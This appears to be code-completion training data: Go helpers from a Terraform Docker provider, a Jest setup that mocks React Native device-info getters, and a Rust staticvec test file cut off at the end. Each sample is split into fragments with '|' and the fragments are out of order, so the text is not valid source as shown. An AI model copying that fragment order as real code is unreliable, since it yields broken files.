removeOpts := dc.RemoveContainerOptions{
ID: d.Id(),
RemoveVolumes: true,
Force: true,
}
if err := client.RemoveContainer(removeOpts); err != nil {
return fmt.Errorf("Error deleting container %s: %s", d.Id(), err)
}
d.SetId("")
return nil
}
func stringListToStringSlice(stringList []interface{}) []string {
ret := []string{}
for _, v := range stringList {
if v == nil {
ret = append(ret, "")
continue
}
ret = append(ret, v.(string))
}
return ret
}
func stringSetToStringSlice(stringSet *schema.Set) []string {
ret := []string{}
if stringSet == nil {
return ret
}
for _, envVal := range stringSet.List() {
ret = append(ret, envVal.(string))
}
return ret
}
func mapTypeMapValsToString(typeMap map[string]interface{}) map[string]string {
mapped := make(map[string]string, len(typeMap))
for k, v := range typeMap {
mapped[k] = v.(string)
}
return mapped
}
func fetchDockerContainer(ID string, client *dc.Client) (*dc.APIContainers, error) |
func portSetToDockerPorts(ports *schema.Set) (map[dc.Port]struct{}, map[dc.Port][]dc.PortBinding) {
retExposedPorts := map[dc.Port]struct{}{}
retPortBindings := map[dc.Port][]dc.PortBinding{}
for _, portInt := range ports.List() {
port := portInt.(map[string]interface{})
internal := port["internal"].(int)
protocol := port["protocol"].(string)
exposedPort := dc.Port(strconv.Itoa(internal) + "/" + protocol)
retExposedPorts[exposedPort] = struct{}{}
external, extOk := port["external"].(int)
ip, ipOk := port["ip"].(string)
if extOk {
portBinding := dc.PortBinding{
HostPort: strconv.Itoa(external),
}
if ipOk {
portBinding.HostIP = ip
}
retPortBindings[exposedPort] = append(retPortBindings[exposedPort], portBinding)
}
}
return retExposedPorts, retPortBindings
}
func extraHostsSetToDockerExtraHosts(extraHosts *schema.Set) []string {
retExtraHosts := []string{}
for _, hostInt := range extraHosts.List() {
host := hostInt.(map[string]interface{})
ip := host["ip"].(string)
hostname := host["host"].(string)
retExtraHosts = append(retExtraHosts, hostname+":"+ip)
}
return retExtraHosts
}
func volumeSetToDockerVolumes(volumes *schema.Set) (map[string]struct{}, []string, []string, error) {
retVolumeMap := map[string]struct{}{}
retHostConfigBinds := []string{}
retVolumeFromContainers := []string{}
for _, volumeInt := range volumes.List() {
volume := volumeInt.(map[string]interface{})
fromContainer := volume["from_container"].(string)
containerPath := volume["container_path"].(string)
volumeName := volume["volume_name"].(string)
if len(volumeName) == 0 {
volumeName = volume["host_path"].(string)
}
readOnly := volume["read_only"].(bool)
switch {
case len(fromContainer) == 0 && len(containerPath) == 0:
return retVolumeMap, retHostConfigBinds, retVolumeFromContainers, errors.New("Volume entry without container path or source container")
case len(fromContainer) != 0 && len(containerPath) != 0:
return retVolumeMap, retHostConfigBinds, retVolumeFromContainers, errors.New("Both a container and a path specified in a volume entry")
case len(fromContainer) != 0:
retVolumeFromContainers = append(retVolumeFromContainers, fromContainer)
case len(volumeName) != 0:
readWrite := "rw"
if readOnly {
readWrite = "ro"
}
retVolumeMap[containerPath] = struct{}{}
retHostConfigBinds = append(retHostConfigBinds, volumeName+":"+containerPath+":"+readWrite)
default:
retVolumeMap[containerPath] = struct{}{}
}
}
return retVolumeMap, retHostConfigBinds, retVolumeFromContainers, nil
}
| {
apiContainers, err := client.ListContainers(dc.ListContainersOptions{All: true})
if err != nil {
return nil, fmt.Errorf("Error fetching container information from Docker: %s\n", err)
}
for _, apiContainer := range apiContainers {
if apiContainer.ID == ID {
return &apiContainer, nil
}
}
return nil, nil
} |
jest.setup.ts | const asyncFn = <T>(response: T) => () =>
jest.fn(() => {
return Promise.resolve(response);
});
const syncFn = <T>(response: T) => () => jest.fn(() => response);
const makeFns = <T>(response: T) => [asyncFn(response), syncFn(response)];
const [stringFnAsync, stringFnSync] = makeFns('unknown');
const [numberFnAsync, numberFnSync] = makeFns(-1);
const [arrayFnAsync, arrayFnSync] = makeFns([]);
const [booleanFnAsync, booleanFnSync] = makeFns(false);
const [objectFnAsync, objectFnSync] = makeFns({});
const RNDeviceInfo: any = {};
const stringKeys = [
'uniqueId',
'deviceId',
'model',
'brand',
'systemName',
'systemVersion',
'bundleId',
'appName',
'buildNumber',
'appVersion',
];
for (const key of stringKeys) {
RNDeviceInfo[key] = 'unknown';
}
const booleanKeys = ['isTablet'];
for (const key of booleanKeys) {
RNDeviceInfo[key] = false;
}
RNDeviceInfo.syncUniqueId = stringFnAsync();
RNDeviceInfo.getDeviceToken = stringFnSync();
// string getters
const stringFnNames = [
'getInstanceId',
'getSerialNumber',
'getAndroidId',
'getIpAddress',
'getMacAddress',
'getSystemManufacturer',
'getBuildId',
'getApiLevel',
'getInstallerPackageName',
'getDeviceName',
'getUserAgent',
'getBootloader',
'getDevice',
'getDisplay',
'getFingerprint',
'getHardware',
'getHost',
'getProduct',
'getTags',
'getType',
'getBaseOs',
'getSecurityPatch',
'getCodename',
'getIncremental', | 'deviceType',
'getInstallReferrer',
];
for (const name of stringFnNames) {
RNDeviceInfo[name] = stringFnAsync();
RNDeviceInfo[`${name}Sync`] = stringFnSync();
}
// boolean getters
const booleanFnNames = [
'isCameraPresent',
'isEmulator',
'isPinOrFingerprintSet',
'isBatteryCharging',
'isAirplaneMode',
'hasSystemFeature',
'isLocationEnabled',
'isHeadphonesConnected',
];
for (const name of booleanFnNames) {
RNDeviceInfo[name] = booleanFnAsync();
RNDeviceInfo[`${name}Sync`] = booleanFnSync();
}
// number getters
const numberFnNames = [
'getUsedMemory',
'getFontScale',
'getPreviewSdkInt',
'getFirstInstallTime',
'getLastUpdateTime',
'getTotalMemory',
'getMaxMemory',
'getTotalDiskCapacity',
'getTotalDiskCapacityOld',
'getFreeDiskStorage',
'getFreeDiskStorageOld',
'getBatteryLevel',
];
for (const name of numberFnNames) {
RNDeviceInfo[name] = numberFnAsync();
RNDeviceInfo[`${name}Sync`] = numberFnSync();
}
const objectFnNames = ['getPowerState', 'getAvailableLocationProviders'];
for (const name of objectFnNames) {
RNDeviceInfo[name] = objectFnAsync();
RNDeviceInfo[`${name}Sync`] = objectFnSync();
}
const arrayFnNames = [
'getSupportedAbis',
'getSupported32BitAbis',
'getSupported64BitAbis',
'getSystemAvailableFeatures',
];
for (const name of arrayFnNames) {
RNDeviceInfo[name] = arrayFnAsync();
RNDeviceInfo[`${name}Sync`] = arrayFnSync();
}
jest.mock('react-native', () => {
const RN = jest.requireActual('react-native'); // use original implementation, which comes with mocks out of the box
// mock modules/components created by assigning to NativeModules
RN.NativeModules.RNDeviceInfo = RNDeviceInfo;
type OS = typeof RN.Platform.OS;
jest.spyOn(RN.Platform, 'select').mockImplementation((obj: OS) => {
return obj.android || obj.ios || obj.default;
});
return RN;
});
jest.mock('./src/internal/nativeInterface', () => ({ default: RNDeviceInfo }));
jest.mock('react-native/Libraries/EventEmitter/NativeEventEmitter.js', () => {
const { EventEmitter } = require('events');
return EventEmitter;
}); | 'getCarrier', |
test_staticvec.rs | #![allow(clippy::all)]
#![allow(dead_code)]
#![allow(unused_imports)]
#![feature(box_syntax, const_fn, const_if_match, const_loop)]
// In case you're wondering, the instances of `#[cfg_attr(all(windows, miri), ignore)]` in this
// file above the `#[should_panic]` tests are there simply because Miri only supports catching
// panics on Unix-like OSes and ignores `#[should_panic]` everywhere else, so without the
// configuration attributes those tests just panic normally under Miri on Windows, which we don't
// want.
// Also, in case you're wondering why there's extensive use of "StaticVecs that contain boxed items"
// (something that would probably not be that common in the sense of normal use of this crate) in
// this file: it's done for the sake of wanting to be as "Miri detectable" as possible, by which I
// mean, "weird stuff done with heap memory" is significantly more likely to set Miri off than
// "weird stuff done with stack memory".
use staticvec::*;
use core::cell;
#[cfg(feature = "std")]
use std::panic::{self, AssertUnwindSafe};
#[cfg(feature = "std")]
use cool_asserts::assert_panics;
#[derive(Debug, Eq, PartialEq, Default)]
struct Counter(cell::Cell<u32>);
impl Counter {
fn increment(&self) {
self.0.set(self.0.get() + 1);
}
fn get(&self) -> u32 {
self.0.get()
}
}
// Helper struct for ensuring things are correctly dropped. Use the `instance`
// method to create a LifespanCountingInstance, then use the init_count
// method to see how many such instances were created (either by clone or by
// `instance`), and the drop_count method to see how many were dropped.
// TODO: create a more advanced version of this pattern that checks WHICH
// elements have been dropped; ie, to ensure that the elements at the end of
// an array are correctly dropped after a truncate
#[derive(Debug, Default)]
struct LifespanCounter {
// The number of times an instance was created
init_count: Counter,
// The number of times an instance was dropped
drop_count: Counter,
}
impl LifespanCounter {
fn instance(&self) -> LifespanCountingInstance {
self.init_count.increment();
LifespanCountingInstance { counter: self }
}
fn init_count(&self) -> u32 {
self.init_count.get()
}
fn drop_count(&self) -> u32 {
self.drop_count.get()
}
}
#[derive(Debug)]
struct LifespanCountingInstance<'a> {
counter: &'a LifespanCounter,
}
impl<'a> Clone for LifespanCountingInstance<'a> {
fn clone(&self) -> Self {
self.counter.instance()
}
// We deliberately do not provide a clone_from; we'd rather the default
// behavior (drop and replace with a fresh instance) is used, so we can
// accurately track clones.
}
impl<'a> Drop for LifespanCountingInstance<'a> {
fn drop(&mut self) {
self.counter.drop_count.increment()
}
}
#[derive(Debug, Eq, PartialEq)]
struct Struct {
s: &'static str,
}
impl Drop for Struct {
fn drop(&mut self) {
// This won't do anything observable in the test context, but it
// works as a placeholder.
println!("Dropping Struct with value: {}", self.s)
}
}
#[derive(Debug, Eq, PartialEq)]
struct ZST {}
impl Drop for ZST {
fn drop(&mut self) {
// This won't do anything observable in the test context, but it
// works as a placeholder.
println!("Dropping a ZST!")
}
}
#[test]
fn append() {
let mut a = staticvec![
box Struct { s: "A" },
box Struct { s: "B" },
box Struct { s: "C" }
];
let mut b = staticvec![
box Struct { s: "D" },
box Struct { s: "E" },
box Struct { s: "F" },
box Struct { s: "G" }
];
let mut c = StaticVec::<Box<Struct>, 6>::new();
c.append(&mut a);
c.append(&mut b);
assert_eq!(format!("{:?}", a), "[]");
assert_eq!(format!("{:?}", b), "[Struct { s: \"G\" }]");
assert_eq!(
c,
staticvec![
box Struct { s: "A" },
box Struct { s: "B" },
box Struct { s: "C" },
box Struct { s: "D" },
box Struct { s: "E" },
box Struct { s: "F" }
]
);
let mut d = staticvec![box 12, box 24];
let mut e = staticvec![box 1, box 2, box 3];
d.pop().unwrap();
d.append(&mut e);
assert_eq!(e, [box 2, box 3]);
assert_eq!(d, [box 12, box 1]);
let mut f = StaticVec::<Box<Struct>, 0>::new();
let mut g = staticvec![box Struct { s: "A" }, box Struct { s: "B" }];
f.append(&mut g);
assert_eq!(f, []);
assert_eq!(g, [box Struct { s: "A" }, box Struct { s: "B" }]);
}
#[test]
fn as_mut_ptr() {
let mut v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.as_mut_ptr(), 1) };
}
#[test]
fn as_mut_slice() {
let mut buffer = staticvec![1, 2, 3, 5, 8];
assert_eq!(buffer.as_mut_slice(), &mut [1, 2, 3, 5, 8]);
}
#[test]
fn as_ptr() {
let v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.as_ptr(), 1) };
}
#[test]
fn as_slice() {
let buffer = staticvec![1, 2, 3, 5, 8];
assert_eq!(buffer.as_slice(), &[1, 2, 3, 5, 8]);
}
#[cfg(feature = "std")]
#[test]
fn bounds_to_string() {
let mut v = staticvec![1, 2, 3, 4];
let it = v.iter();
assert_eq!(
"Current value of element at `start`: 1\nCurrent value of element at `end`: 4",
it.bounds_to_string()
);
let itm = v.iter_mut();
assert_eq!(
"Current value of element at `start`: 1\nCurrent value of element at `end`: 4",
itm.bounds_to_string()
);
let itv = v.into_iter();
assert_eq!(
"Current value of element at `start`: 1\nCurrent value of element at `end`: 4",
itv.bounds_to_string()
);
let mut v2 = StaticVec::<Box<i32>, 0>::new();
let it2 = v2.iter();
assert_eq!("Empty iterator!", it2.bounds_to_string());
let itm2 = v2.iter_mut();
assert_eq!("Empty iterator!", itm2.bounds_to_string());
let itv2 = v2.into_iter();
assert_eq!("Empty iterator!", itv2.bounds_to_string());
}
#[test]
fn capacity() {
let vec = StaticVec::<i32, 10>::new();
assert_eq!(vec.capacity(), 10);
}
#[test]
fn clear() {
let mut v = staticvec![1, 2, 3];
v.clear();
assert!(v.is_empty());
}
#[test]
fn clone() {
let v = staticvec![1, 2, 3, 4, 5, 6, 7, 8];
let vv = v.clone();
assert_eq!(v, vv);
}
#[test]
fn clone_from_shorter() {
let src: StaticVec<u32, 20> = (1..10).collect();
let mut dst: StaticVec<u32, 20> = (0..15).collect();
dst.clone_from(&src);
assert_eq!(dst, src);
}
#[test]
fn clone_from_longer() {
let src: StaticVec<u32, 20> = (0..15).collect();
let mut dst: StaticVec<u32, 20> = (1..10).collect();
dst.clone_from(&src);
assert_eq!(dst, src);
}
#[cfg_attr(all(windows, miri), ignore)]
#[cfg(feature = "std")]
#[test]
fn panicking_clone() {
// An earlier implementation of clone incorrectly leaked values in the event
// of a panicking clone. This test ensures that that does not happen.
// This struct will, if so configured, panic on a clone. Uses
// LifespanCountingInstance to track instantiations and deletions, so that
// we can ensure the correct number of drops are happening
#[derive(Debug)]
struct MaybePanicOnClone<'a> {
tracker: LifespanCountingInstance<'a>,
should_panic: bool,
}
impl<'a> MaybePanicOnClone<'a> {
fn new(counter: &'a LifespanCounter, should_panic: bool) -> Self {
Self {
tracker: counter.instance(),
should_panic,
}
}
}
impl<'a> Clone for MaybePanicOnClone<'a> {
fn clone(&self) -> Self {
if self.should_panic {
panic!("Clone correctly panicked during a test")
} else {
Self {
tracker: self.tracker.clone(),
should_panic: self.should_panic,
}
}
}
}
let lifespan_tracker = LifespanCounter::default();
let mut vec1: StaticVec<MaybePanicOnClone, 20> = StaticVec::new();
for _ in 0..5 {
vec1.push(MaybePanicOnClone::new(&lifespan_tracker, false));
}
vec1.push(MaybePanicOnClone::new(&lifespan_tracker, true));
// Sanity check: we've created 6 instances and dropped none of them
assert_eq!(lifespan_tracker.init_count(), 6);
assert_eq!(lifespan_tracker.drop_count(), 0);
// Attempt to clone the staticvec; this will panic. This should result in
// 5 successful clones, followed by a panic, followed by 5 drops during
// unwinding.
let result = panic::catch_unwind(AssertUnwindSafe(|| {
let vec2 = vec1.clone();
vec2
}));
// Ensure that a panic did occur
assert!(result.is_err());
// At this point, 5 instances should have been created and dropped in the
// aborted clone
assert_eq!(lifespan_tracker.init_count(), 11);
assert_eq!(lifespan_tracker.drop_count(), 5);
drop(vec1);
assert_eq!(lifespan_tracker.init_count(), 11);
assert_eq!(lifespan_tracker.drop_count(), 11);
}
/*
#[test]
fn concat() {
assert!(
staticvec!["A, B"].concat(&staticvec!["C", "D", "E", "F"]) == ["A, B", "C", "D", "E", "F"]
);
let v = StaticVec::<i32, 0>::from([]).concat(&StaticVec::<i32, 0>::from([]));
assert_eq!(v, []);
let v2 = staticvec![4, 5, 6].concat(&staticvec![1, 2, 3]);
assert_eq!(v2, [4, 5, 6, 1, 2, 3]);
}
#[test]
fn concat_clone() {
assert!(
staticvec![Box::new("A, B")].concat_clone(&staticvec![
Box::new("C"),
Box::new("D"),
Box::new("E"),
Box::new("F")
]) == [
Box::new("A, B"),
Box::new("C"),
Box::new("D"),
Box::new("E"),
Box::new("F")
]
);
let v = StaticVec::<i32, 0>::from([]).concat_clone(&StaticVec::<i32, 0>::from([]));
assert_eq!(v, []);
let v2 = staticvec![Box::new(4), Box::new(5), Box::new(6)].concat_clone(&staticvec![
Box::new(1),
Box::new(2),
Box::new(3)
]);
assert_eq!(
v2,
[
Box::new(4),
Box::new(5),
Box::new(6),
Box::new(1),
Box::new(2),
Box::new(3)
]
);
}
*/
#[test]
fn contains() {
assert_eq!(staticvec![1, 2, 3].contains(&2), true);
assert_eq!(staticvec![1, 2, 3].contains(&4), false);
}
#[test]
fn dedup() {
let mut vec = staticvec![1, 2, 2, 3, 2];
vec.dedup();
assert_eq!(vec, [1, 2, 3, 2]);
}
#[test]
fn dedup_by() {
let mut vec = staticvec!["foo", "bar", "Bar", "baz", "bar"];
vec.dedup_by(|a, b| a.eq_ignore_ascii_case(b));
assert_eq!(vec, ["foo", "bar", "baz", "bar"]);
}
#[test]
fn dedup_by_key() {
let mut vec = staticvec![10, 20, 21, 30, 20];
vec.dedup_by_key(|i| *i / 10);
assert_eq!(vec, [10, 20, 30, 20]);
}
#[test]
fn difference() {
assert_eq!(
staticvec![4, 5, 6, 7].difference(&staticvec![1, 2, 3, 7]),
[4, 5, 6]
);
assert_eq!(staticvec![1, 2, 3].difference(&staticvec![3, 4, 5]), [1, 2]);
}
#[test]
fn drain() {
let mut v = staticvec![1, 2, 3];
let u = v.drain(1..);
assert_eq!(v, &[1]);
assert_eq!(u, &[2, 3]);
v.drain(..);
assert_eq!(v, &[]);
let mut v = StaticVec::from([0; 8]);
v.pop();
v.drain(0..7);
assert_eq!(&v[..], &[]);
v.extend(0..);
v.drain(1..4);
assert_eq!(&v[..], &[0, 4, 5, 6, 7]);
let u: StaticVec<u8, 3> = v.drain(1..4).iter().rev().collect();
assert_eq!(&u[..], &[6, 5, 4]);
assert_eq!(&v[..], &[0, 7]);
v.drain(..);
assert_eq!(&v[..], &[]);
let mut v2 = StaticVec::from([0; 8]);
v2.drain(0..=7);
assert_eq!(&v2[..], &[]);
v2.extend(0..);
v2.drain(1..=4);
assert_eq!(&v2[..], &[0, 5, 6, 7]);
let u: StaticVec<u8, 3> = v2.drain(1..=2).iter().rev().collect();
assert_eq!(&u[..], &[6, 5]);
assert_eq!(&v2[..], &[0, 7]);
v2.drain(..);
assert_eq!(&v2[..], &[]);
let mut v3 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v3.pop();
v3.drain(0..7);
assert_eq!(&v3[..], &[]);
let mut v4 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v4.drain(0..4);
assert_eq!(
&v4[..],
&[Box::new(12), Box::new(12), Box::new(12), Box::new(12)]
);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn drain_panic() {
let mut v3 = StaticVec::from([0; 0]);
v3.drain(0..=0);
}
#[test]
fn drain_iter() {
let mut v = staticvec![1, 2, 3];
let u: StaticVec<i32, 6> = v.drain_iter(1..).collect();
assert_eq!(v, &[1]);
assert_eq!(u, &[2, 3]);
v.drain_iter(..);
assert_eq!(v, &[]);
let mut v = StaticVec::from([0; 8]);
v.pop();
v.drain_iter(0..7);
assert_eq!(&v[..], &[]);
v.extend(0..);
v.drain_iter(1..4);
assert_eq!(&v[..], &[0, 4, 5, 6, 7]);
let u: StaticVec<_, 3> = v.drain_iter(1..4).rev().collect();
assert_eq!(&u[..], &[6, 5, 4]);
assert_eq!(&v[..], &[0, 7]);
v.drain_iter(..);
assert_eq!(&v[..], &[]);
let mut v2 = StaticVec::from([0; 8]);
v2.drain_iter(0..=7);
assert_eq!(&v2[..], &[]);
v2.extend(0..);
v2.drain_iter(1..=4);
assert_eq!(&v2[..], &[0, 5, 6, 7]);
let u: StaticVec<_, 3> = v2.drain_iter(1..=2).rev().collect();
assert_eq!(&u[..], &[6, 5]);
assert_eq!(&v2[..], &[0, 7]);
v2.drain_iter(..);
assert_eq!(&v2[..], &[]);
let mut v3 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v3.pop();
v3.drain_iter(0..7);
assert_eq!(&v3[..], &[]);
let mut v4 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v4.drain_iter(0..4);
assert_eq!(
&v4[..],
&[Box::new(12), Box::new(12), Box::new(12), Box::new(12)]
);
let mut v5 = staticvec![
ZST {},
ZST {},
ZST {},
ZST {},
ZST {},
ZST {},
ZST {},
ZST {}
];
v5.drain_iter(0..4);
assert_eq!(&v5[..], &[ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn drain_iter_panic() {
let mut v3 = StaticVec::from([0; 0]);
v3.drain_iter(0..=0);
}
#[test]
fn drain_filter() {
let mut numbers = staticvec![1, 2, 3, 4, 5, 6, 8, 9, 11, 13, 14, 15];
let evens = numbers.drain_filter(|x| *x % 2 == 0);
let odds = numbers;
assert_eq!(evens, [2, 4, 6, 8, 14]);
assert_eq!(odds, [1, 3, 5, 9, 11, 13, 15]);
let mut empty: StaticVec<i32, 12> = StaticVec::from([]);
assert_eq!(empty.drain_filter(|x| *x == 0), []);
let mut structs: StaticVec<Box<Struct>, 4> = staticvec![
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "D" })
];
assert_eq!(
structs.drain_filter(|s| s.s > "B"),
[Box::new(Struct { s: "C" }), Box::new(Struct { s: "D" })]
);
}
#[test]
fn extend() {
let mut c = StaticVec::<i32, 6>::new();
c.push(5);
c.push(6);
c.push(7);
c.extend(staticvec![1, 2, 3].iter());
assert_eq!("[5, 6, 7, 1, 2, 3]", format!("{:?}", c));
c.clear();
assert_eq!(c.len(), 0);
c.extend([1].iter());
assert_eq!(c.len(), 1);
c.extend(staticvec![1, 2, 3, 4, 5, 6, 7].into_iter());
assert_eq!(c.len(), 6);
c.clear();
c.extend(staticvec![1, 2, 3, 4, 5, 6, 7]);
assert_eq!(c.len(), 6);
let c2 = staticvec![vec![1, 1], vec![1, 2], vec![1, 3], vec![1, 4]];
let mut c3 = StaticVec::<Vec<u8>, 2>::new();
c3.extend(c2);
assert_eq!(c3, [vec![1, 1], vec![1, 2]]);
let c4 = staticvec![vec![1, 1], vec![1, 2], vec![1, 3], vec![1, 4]];
let mut c5 = StaticVec::<Vec<u8>, 4>::new();
c5.extend(c4);
assert_eq!(c5, [vec![1, 1], vec![1, 2], vec![1, 3], vec![1, 4]]);
let c6 = staticvec![
vec![vec![1, 1]],
vec![vec![1, 2]],
vec![vec![1, 3]],
vec![vec![1, 4]],
vec![vec![1, 5]],
vec![vec![1, 6]]
];
let mut c7 = StaticVec::<Vec<Vec<u8>>, 3>::new();
c7.extend(c6);
assert_eq!(c7, [vec![vec![1, 1]], vec![vec![1, 2]], vec![vec![1, 3]]]);
}
#[test]
fn extend_from_slice() {
let mut vec = StaticVec::<i32, 4>::new_from_slice(&[1]);
vec.extend_from_slice(&[2, 3, 4]);
assert_eq!(vec, [1, 2, 3, 4]);
}
#[test]
fn filled_with() {
let mut i = 0;
let v = StaticVec::<i32, 64>::filled_with(|| {
i += 1;
i
});
assert_eq!(v.len(), 64);
assert_eq!(v[0], 1);
assert_eq!(v[1], 2);
assert_eq!(v[2], 3);
assert_eq!(v[3], 4);
}
#[test]
fn filled_with_by_index() {
let v = StaticVec::<usize, 64>::filled_with_by_index(|i| i + 1);
assert_eq!(v.len(), 64);
assert_eq!(v[0], 1);
assert_eq!(v[1], 2);
assert_eq!(v[2], 3);
assert_eq!(v[3], 4);
}
#[test]
fn first() {
let v = staticvec![1, 2, 3];
assert_eq!(*v.first().unwrap(), 1);
}
#[test]
fn first_mut() {
let mut v = staticvec![1, 2, 3];
assert_eq!(*v.first_mut().unwrap(), 1);
}
#[test]
fn from() {
assert_eq!(
"[5, 6, 7, 1, 2, 3]",
format!("{:?}", StaticVec::<i32, 6>::from(&[5, 6, 7, 1, 2, 3]))
);
assert_eq!(
"[1, 1, 1, 1, 1, 1]",
format!("{:?}", StaticVec::<i32, 6>::from([1; 6]))
);
let mut v = staticvec![1];
v.clear();
assert_eq!(StaticVec::<i32, 6>::from(v.as_slice()).len(), 0);
assert_eq!(StaticVec::from(["A"]), ["A"]);
assert_eq!(
StaticVec::from([Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]),
[Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]
);
}
#[test]
fn from_iter() {
assert_eq!(
StaticVec::<u8, 12>::from_iter(&[1, 2, 3, 4, 5, 6]),
[1, 2, 3, 4, 5, 6]
);
assert_eq!(
StaticVec::<u8, 12>::from_iter([1, 2, 3, 4, 5, 6].iter()),
[1, 2, 3, 4, 5, 6]
);
assert_eq!(
StaticVec::<u8, 12>::from_iter(staticvec![1, 2, 3, 4, 5, 6].iter()),
[1, 2, 3, 4, 5, 6]
);
assert_eq!(StaticVec::<u8, 0>::from_iter(&[1, 2, 3, 4, 5, 6]), []);
assert_eq!(
StaticVec::<Box<Struct>, 2>::from_iter(
staticvec![Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })].into_iter()
),
[Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]
);
assert_eq!(
StaticVec::<Box<Struct>, 2>::from_iter(staticvec![
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "C" })
]),
[Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]
);
assert_eq!(
StaticVec::<Box<Struct>, 4>::from_iter(staticvec![
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "C" })
]),
[
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "C" })
]
);
}
#[cfg(feature = "std")]
#[test]
fn from_vec() {
let v = vec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" }),
];
let vv = StaticVec::<Box<Struct>, 2>::from_vec(v);
assert_eq!(vv.capacity(), 2);
assert_eq!(vv.len(), 2);
assert_eq!(
vv,
[Box::new(Struct { s: "AAA" }), Box::new(Struct { s: "BBB" })]
);
let x = Vec::<Box<Struct>>::new();
let y = StaticVec::<Box<Struct>, 1>::from_vec(x);
assert_eq!(y, []);
}
#[test]
fn get_unchecked() {
let v = staticvec!["a", "b", "c"];
assert_eq!(unsafe { *v.get_unchecked(1) }, "b");
}
#[test]
fn get_unchecked_mut() {
let mut v = staticvec!["a", "b", "c"];
assert_eq!(unsafe { *v.get_unchecked_mut(1) }, "b");
}
#[test]
fn index() {
let vec = staticvec![0, 1, 2, 3, 4];
assert_eq!(vec[3], 3);
assert_eq!(vec[1..4], [1, 2, 3]);
assert_eq!(vec[1..=1], [1]);
assert_eq!(vec[1..3], [1, 2]);
assert_eq!(vec[..3], [0, 1, 2]);
assert_eq!(vec[..=3], [0, 1, 2, 3]);
assert_eq!(vec[1..], [1, 2, 3, 4]);
assert_eq!(vec[1..=3], [1, 2, 3]);
assert_eq!(vec[..], [0, 1, 2, 3, 4]);
}
#[cfg(not(miri))]
#[test]
#[cfg(feature = "std")]
fn index_panics() {
let vec = staticvec![0, 1, 2, 3, 4];
// Miri can't run this one because the `assert_panics` macro allows *all* of these
// expected panics to occur one after another, while Miri can only catch one panic at
// a time (and specifically only in `should_panic` tests).
assert_panics!(vec[10]);
assert_panics!(&vec[..10]);
assert_panics!(&vec[10..]);
assert_panics!(&vec[10..15]);
assert_panics!(&vec[1..0]);
}
#[test]
fn insert() {
let mut vec = StaticVec::<i32, 5>::new_from_slice(&[1, 2, 3]);
vec.insert(1, 4);
assert_eq!(vec, [1, 4, 2, 3]);
vec.insert(4, 5);
assert_eq!(vec, [1, 4, 2, 3, 5]);
}
// The next couple of tests for `insert_many` are adapted from the SmallVec testsuite.
#[test]
fn insert_many() {
let mut v: StaticVec<u8, 8> = StaticVec::new();
for x in 0..4 {
v.push(x);
}
assert_eq!(v.len(), 4);
v.insert_many(1, [5, 6].iter().cloned());
assert_eq!(
&v.iter().map(|v| *v).collect::<StaticVec<_, 8>>(),
&[0, 5, 6, 1, 2, 3]
);
v.clear();
for x in 0..4 {
v.push(x);
}
assert_eq!(v.len(), 4);
v.insert_many(1, [5, 6].iter().cloned());
assert_eq!(
&v.iter().map(|v| *v).collect::<StaticVec<_, 8>>(),
&[0, 5, 6, 1, 2, 3]
);
v.clear();
for i in 0..6 {
v.push(i + 1);
}
v.insert_many(6, [1].iter().cloned());
assert_eq!(
&v.iter().map(|v| *v).collect::<StaticVec<_, 8>>(),
&[1, 2, 3, 4, 5, 6, 1]
);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic(expected = "Insufficient remaining capacity / out of bounds!")]
fn insert_many_panic() {
let mut v: StaticVec<u8, 8> = StaticVec::new();
for i in 0..7 {
v.push(i + 1);
}
v.insert_many(0, [1, 2, 3, 4].iter().cloned());
let mut v2: StaticVec<u8, 0> = StaticVec::new();
v2.insert_many(27, [1, 2, 3, 4].iter().cloned());
}
#[test]
fn intersection() {
assert_eq!(
staticvec![4, 5, 6, 7].intersection(&staticvec![1, 2, 3, 7, 4]),
[4, 7],
);
}
/*
#[test]
fn intersperse() {
assert_eq!(
staticvec!["A", "B", "C", "D"].intersperse("Z"),
["A", "Z", "B", "Z", "C", "Z", "D"]
);
assert_eq!(staticvec![""].intersperse("B"), [""]);
assert_eq!(staticvec!["A"].intersperse("B"), ["A"]);
let mut x = staticvec!["A"];
x.clear();
assert_eq!(x.intersperse("B"), StaticVec::<&str, 0>::new());
}
#[test]
fn intersperse_clone() {
assert_eq!(
staticvec!["A", "B", "C", "D"].intersperse_clone("Z"),
["A", "Z", "B", "Z", "C", "Z", "D"]
);
assert_eq!(staticvec![""].intersperse_clone("B"), [""]);
assert_eq!(staticvec!["A"].intersperse_clone("B"), ["A"]);
let mut x = staticvec!["A"];
x.clear();
assert_eq!(x.intersperse_clone("B"), StaticVec::<&str, 0>::new());
}
*/
#[test]
fn is_empty() {
let mut v = StaticVec::<i32, 1>::new();
assert!(v.is_empty());
v.push(1);
assert!(!v.is_empty());
}
#[test]
fn is_not_empty() {
let mut v = StaticVec::<i32, 1>::new();
assert!(v.is_empty());
v.push(1);
assert!(v.is_not_empty());
}
#[test]
